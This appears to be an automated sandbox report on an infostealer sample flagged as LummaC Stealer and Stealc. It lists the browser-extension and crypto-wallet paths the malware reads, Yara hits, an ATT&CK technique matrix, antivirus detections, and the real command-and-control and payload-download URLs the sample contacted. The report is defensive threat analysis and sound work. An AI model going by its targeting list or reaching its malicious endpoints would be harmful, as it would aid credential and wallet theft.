Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB

Source: Yara match	File source: 0000005F.00000002.3080054102.000000000106A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000048.00000002.2847739152.0000000002D17000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000003.2841223672.0000000000F8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000048.00000002.2847739152.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000038.00000002.3043805195.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.3056952575.00000000031B6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 2872, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2090621607.exe PID: 12448, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 12568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 2090621607.exe PID: 16232, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match

File source: decrypted.memstr, type: MEMORYSTR

Yara detected MicroClip

Source: Yara match

File source: Process Memory Space: InstallUtil.exe PID: 2872, type: MEMORYSTR

Yara detected Stealc

Source: Yara match	File source: 75.2.0717674af5.exe.c90000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000004B.00000002.2734723718.0000000000C91000.00000040.00000001.01000000.00000011.sdmp, type: MEMORY
Source: Yara match	File source: 0000004B.00000002.2733720136.0000000000B32000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000004B.00000003.2641943936.0000000005120000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000081.00000003.2843067219.00000000056B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 0717674af5.exe PID: 6972, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 0717674af5.exe PID: 7408, type: MEMORYSTR
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0042EC48 Concurrency::details::ContextBase::TraceContextEvent,Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,		6_2_0042EC48
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_0042DF51 Concurrency::details::SchedulerBase::GetInternalContext,Concurrency::details::WorkItem::ResolveToken,Concurrency::details::WorkItem::BindTo,Concurrency::details::SchedulerBase::GetInternalContext,		6_2_0042DF51

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	331 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	31 Disable or Modify Tools	1 OS Credential Dumping	1 System Time Discovery	Remote Services	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	2 Bypass User Account Control	211 Deobfuscate/Decode Files or Information	LSASS Memory	2 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	2 Command and Scripting Interpreter	11 Scheduled Task/Job	212 Process Injection	5 Obfuscated Files or Information	Security Account Manager	436 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	11 Scheduled Task/Job	121 Registry Run Keys / Startup Folder	11 Scheduled Task/Job	33 Software Packing	NTDS	1261 Security Software Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	2 PowerShell	Network Logon Script	121 Registry Run Keys / Startup Folder	1 DLL Side-Loading	LSA Secrets	2 Process Discovery	SSH	Keylogging	115 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Bypass User Account Control	Cached Domain Credentials	581 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	581 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	212 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
lIocM276SA.exe	53%	ReversingLabs	Win32.Infostealer.Tinba
lIocM276SA.exe	58%	Virustotal		Browse
lIocM276SA.exe	100%	Avira	TR/Crypt.TPM.Gen
lIocM276SA.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\pohtent2[1].exe	100%	Avira	HEUR/AGEN.1309270
C:\Users\user\AppData\Roaming\TypeId.exe	100%	Avira	HEUR/AGEN.1309270
C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	100%	Avira	HEUR/AGEN.1309270
C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Avira	TR/Crypt.TPM.Gen
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\pohtent2[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\TypeId.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	39%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\pohtent2[1].exe	26%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1004537001\pohtent2.exe	26%	ReversingLabs
C:\Users\user\AppData\Local\Temp\1004550001\2090621607.exe	45%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1004551001\0717674af5.exe	39%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\1004553001\4477947f1f.exe	39%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	53%	ReversingLabs	Win32.Infostealer.Tinba
C:\Users\user\AppData\Roaming\TypeId.exe	26%	ReversingLabs

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
trashycontinuousbubbly.com	11%	Virustotal		Browse
tmpfiles.org	4%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
https://presticitpo.store:443/api;1	100%	Avira URL Cloud	malware
http://tmpfiles.org/dl/15309322/pohtent2.exe	0%	Avira URL Cloud	safe
http://185.215.113.43/es	100%	Avira URL Cloud	malware
https://tmpfiles.org/P	0%	Avira URL Cloud	safe
http://185.215.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49#	100%	Avira URL Cloud	malware
http://185.215.113.206/6c4adf523b719729.php/u	100%	Avira URL Cloud	malware
https://tmpfiles.org/t	0%	Avira URL Cloud	safe
http://185.215.113.43/ocal	100%	Avira URL Cloud	malware
http://185.215.113.16/luma/random.exeM	100%	Avira URL Cloud	phishing
http://185.215.113.16/off/random.exeb	100%	Avira URL Cloud	phishing
https://support.mic	0%	Avira URL Cloud	safe
http://185.215.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49#	18%	Virustotal		Browse
https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103Google	0%	Avira URL Cloud	safe
http://185.215.113.16/off/random.exe=	100%	Avira URL Cloud	phishing
http://tmpfiles.org/dl/15309322/pohtent2.exe21	0%	Avira URL Cloud	safe
https://founpiuer.store/apistr	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpncodedE	100%	Avira URL Cloud	malware
http://185.215.113.43/Zu7JuNko/index.phpY	100%	Avira URL Cloud	malware
https://trashycontinuousbubbly.com/favicon.ico	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.phpM	100%	Avira URL Cloud	malware
https://tmpfiles.org/dl/15309322/pohtent2.exeV	0%	Avira URL Cloud	safe
http://185.215.113.43/Zu7JuNko/index.php4553001	100%	Avira URL Cloud	malware
https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103	0%	Avira URL Cloud	safe
http://185.215.113.16/luma/random.exeX	100%	Avira URL Cloud	phishing
https://founpiuer.store/e/n	100%	Avira URL Cloud	malware
http://185.215.113.16/off/random.exec61395d7f	100%	Avira URL Cloud	phishing
https://founpiuer.store/bool	100%	Avira URL Cloud	malware
http://tmpfiles.org/dl/15309322/pohtent2.exeex	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
trashycontinuousbubbly.com	172.240.127.234	true	false	11%, Virustotal, Browse	unknown
tmpfiles.org	172.67.195.247	true	false	4%, Virustotal, Browse	unknown
founpiuer.store	172.67.133.135	true	false		high
www.google.com	142.250.185.132	true	false		high
presticitpo.store	unknown	unknown	false		high
thumbystriw.store	unknown	unknown	false		high
necklacedmny.store	unknown	unknown	false		high
crisiwarny.store	unknown	unknown	false		high
fadehairucw.store	unknown	unknown	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://185.215.113.206/	false		high
https://www.google.com/gen_204?s=webhp&t=cap&atyp=csi&ei=NF8sZ4qbEPzWi-gP9LDl-Qk&rt=wsrt.7765,cbt.15459,fht.0,hst.15456&opi=89978449&dt=&ts=300	false		high
necklacedmny.store	false		high
fadehairucw.store	false		high
http://185.215.113.43/Zu7JuNko/index.php	false		high
http://185.215.113.206/6c4adf523b719729.php	false		high
https://www.google.com/gen_204?s=webhp&t=aft&atyp=csi&ei=L18sZ4fZFKuJ-d8P0-fO-AU&rt=wsrt.3055,aft.38237,cbt.15665,fht.0,hst.15663,prt.38237&imn=11&ima=0&imad=0&imac=2&wh=907&aft=1&aftp=-1&opi=89978449&dt=&ts=211877	false		high
founpiuer.store	false		high
crisiwarny.store	false		high
https://www.google.com/xjs/_/ss/k=xjs.hd.URsTCE79FvA.L.B1.O/am=JFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAQAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/d=1/ed=1/br=1/rs=ACT90oFhTcC6qqFSdY-IWvX2meQ47EUcpA/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,d,csi	false		high
scriptyprefej.store	false		high
https://www.google.com/async/hpba?yv=3&cs=0&ei=NF8sZ4qbEPzWi-gP9LDl-Qk&async=_basejs:/xjs/_/js/k%3Dxjs.hd.en_US.Ha-Xy1r_mr4.es5.O/am%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAYAAABAAAAAAAgAAAAAAAAAAoQAQBAAAAQAAAAsAAAQCACAAAAEBAAABAB4lCkAAiQAAAAAAAgAEAAAAAACAABAAAAAAAAAQAEAAAAAAAIAAAAAAAAAgYAAAAAAAAAAAAAAAQAA6AEAAAAAQABAEAAAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJCAhAAAAAAAAAAAAAAAAAAACRJi5s/dg%3D0/br%3D1/rs%3DACT90oFs2Zqnxfhjbxgu6kzN0zBzbTyqtQ,_basecss:/xjs/_/ss/k%3Dxjs.hd.URsTCE79FvA.L.B1.O/am%3DJFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAwAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/br%3D1/rs%3DACT90oH8F5TBlHJCEu7ijntWqevhy0CRoA,_basecomb:/xjs/_/js/k%3Dxjs.hd.en_US.Ha-Xy1r_mr4.es5.O/ck%3Dxjs.hd.URsTCE79FvA.L.B1.O/am%3DJFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABN5JAABMALABBAgAAAAAAAMAAoQAQRAAAAQAIACsAAAQCACABABEBIEAhAJ4lCkwAiSAgAzg_QggEQAAoCACgABAABBABhoCUQGIAgQAAAIAAAABAAAAgZEAAgEAOgACYAAQCQCA6IEAAAAAQEFAcCYAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJKAhAAAAAAAAAAAAAAAAAAACRJi5s/d%3D1/ed%3D1/dg%3D0/br%3D1/ujg%3D1/rs%3DACT90oErR92RueQ28tcY4IdxQ4bbOunDyg,_fmt:prog,_id:_NF8sZ4qbEPzWi-gP9LDl-Qk_8&sp_imghp=false&sp_hpep=2&sp_hpte=0&vet=10ahUKEwiKhc39zMmJAxV86wIHHXRYOZ8Qj-0KCBU..i	false		high
https://founpiuer.store/api	false		high
https://www.google.com/	false		high
https://www.google.com/gen_204?s=webhp&t=cap&atyp=csi&ei=MF8sZ_SOKqXWi-gP04WbuQo&rt=wsrt.4194,cbt.13172,fht.0,hst.13170&opi=89978449&dt=&ts=300	false		high
https://www.google.com/gen_204?s=webhp&t=cap&atyp=csi&ei=L18sZ4fZFKuJ-d8P0-fO-AU&rt=wsrt.3055,cbt.15665,fht.0,hst.15663&opi=89978449&dt=&ts=300	false		high
https://www.google.com/async/hpba?yv=3&cs=0&ei=L18sZ4fZFKuJ-d8P0-fO-AU&async=_basejs:/xjs/_/js/k%3Dxjs.hd.en_US.Ha-Xy1r_mr4.es5.O/am%3DAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAYAAABAAAAAAAgAAAAAAAAAAoQAQBAAAAQAAAAsAAAQCACAAAAEBAAABAB4lCkAAiQAAAAAAAgAEAAAAAACAABAAAAAAAAAQAEAAAAAAAIAAAAAAAAAgYAAAAAAAAAAAAAAAQAA6AEAAAAAQABAEAAAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJCAhAAAAAAAAAAAAAAAAAAACRJi5s/dg%3D0/br%3D1/rs%3DACT90oFs2Zqnxfhjbxgu6kzN0zBzbTyqtQ,_basecss:/xjs/_/ss/k%3Dxjs.hd.URsTCE79FvA.L.B1.O/am%3DJFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAwAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/br%3D1/rs%3DACT90oH8F5TBlHJCEu7ijntWqevhy0CRoA,_basecomb:/xjs/_/js/k%3Dxjs.hd.en_US.Ha-Xy1r_mr4.es5.O/ck%3Dxjs.hd.URsTCE79FvA.L.B1.O/am%3DJFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABN5JAABMALABBAgAAAAAAAMAAoQAQRAAAAQAIACsAAAQCACABABEBIEAhAJ4lCkwAiSAgAzg_QggEQAAoCACgABAABBABhoCUQGIAgQAAAIAAAABAAAAgZEAAgEAOgACYAAQCQCA6IEAAAAAQEFAcCYAhoABCCAAAAAAANAHAMEDMKSwAAAAAAAAAAAAAAAACJAgmAsJKAhAAAAAAAAAAAAAAAAAAACRJi5s/d%3D1/ed%3D1/dg%3D0/br%3D1/ujg%3D1/rs%3DACT90oErR92RueQ28tcY4IdxQ4bbOunDyg,_fmt:prog,_id:_L18sZ4fZFKuJ-d8P0-fO-AU_8&sp_imghp=false&sp_hpep=2&sp_hpte=0&vet=10ahUKEwjHrKD7zMmJAxWrRP4FHdOzE18Qj-0KCBU..i	false		high
https://trashycontinuousbubbly.com/favicon.ico	true	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png	false		high
presticitpo.store	false		high
https://www.google.com/xjs/_/ss/k=xjs.hd.URsTCE79FvA.L.B1.O/am=JFUAAAAAAIAAAAAAAAAAAAAAAAAAAAAAAAACAAAAAAAABNhJAAAMALABBAgAAAAAAAMAAAAAARAAAAAAIACoAAAAAAAABABABIEAgAIAACAwAgCAgAzg_QggAQAAoCAAgABAABBABhoCUQGIAgQAAAAAAAABAAAAgBEAAgEAOgACYAAQCQCA6IEAAAAAAEEAYCYAhoABCAAAAAAAAEAGAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAgAKA/d=1/ed=1/br=1/rs=ACT90oH8F5TBlHJCEu7ijntWqevhy0CRoA/m=cdos,hsm,jsa,mb4ZUb,cEt90b,SNUn3,qddgKe,sTsDMc,dtl0hd,eHDfl,d,csi	false		high
https://www.google.com/gen_204?s=webhp&t=cap&atyp=csi&ei=Ml8sZ_LyK-6Ii-gPydOHeA&rt=wsrt.5727,cbt.10904,fht.0,hst.10902&opi=89978449&dt=&ts=300	false		high
https://trashycontinuousbubbly.com/nuy7khqk?key=dfdceae1749487fe3ee94c1a351e9103	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://www.cloudflare.com/learning/access-management/phishing-attack/	2090621607.exe, 00000038.00000003.2727286266.0000000000F7E000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 0000005F.00000003.2937466911.0000000001047000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	false		high
https://founpiuer.store/apii	2090621607.exe, 00000038.00000003.2727318895.0000000000F21000.00000004.00000020.00020000.00000000.sdmp, 2090621607.exe, 00000038.00000003.2727527963.0000000000F23000.00000004.00000020.00020000.00000000.sdmp	false		high
https://presticitpo.store:443/api;1	2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://duckduckgo.com/ac/?q=	2090621607.exe, 00000038.00000003.2842225150.00000000058E7000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.43/fac00b58987e8e4f4b2846d934f48b15eaa495c49#	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false	18%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.broofa.com	chromecache_193.16.dr	false		high
http://185.215.113.43/es	skotes.exe, 00000006.00000002.3059247457.0000000000E09000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://tmpfiles.org/P	skotes.exe, 00000006.00000002.3059247457.0000000000DD9000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://founpiuer.store/pi	2090621607.exe, 0000005F.00000002.3059429528.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.cloudflare.com/learning/access-mana7	2090621607.exe, 00000038.00000003.2727318895.0000000000F0E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tmpfiles.org/dl/15309322/pohtent2.exe	skotes.exe, 00000006.00000002.3059247457.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://founpiuer.store/apis	2090621607.exe, 0000005F.00000002.3059429528.0000000001006000.00000004.00000020.00020000.00000000.sdmp	false		high
https://founpiuer.store:443/api	2090621607.exe, 0000005F.00000002.3059429528.0000000000FD5000.00000004.00000020.00020000.00000000.sdmp	false		high
http://185.215.113.206/ws	0717674af5.exe, 0000004B.00000002.2733720136.0000000000B78000.00000004.00000020.00020000.00000000.sdmp	false		high
https://tmpfiles.org/t	skotes.exe, 00000006.00000002.3059247457.0000000000DF0000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com	2090621607.exe, 00000038.00000003.2787979264.00000000058FE000.00000004.00000800.00020000.00000000.sdmp	false		high
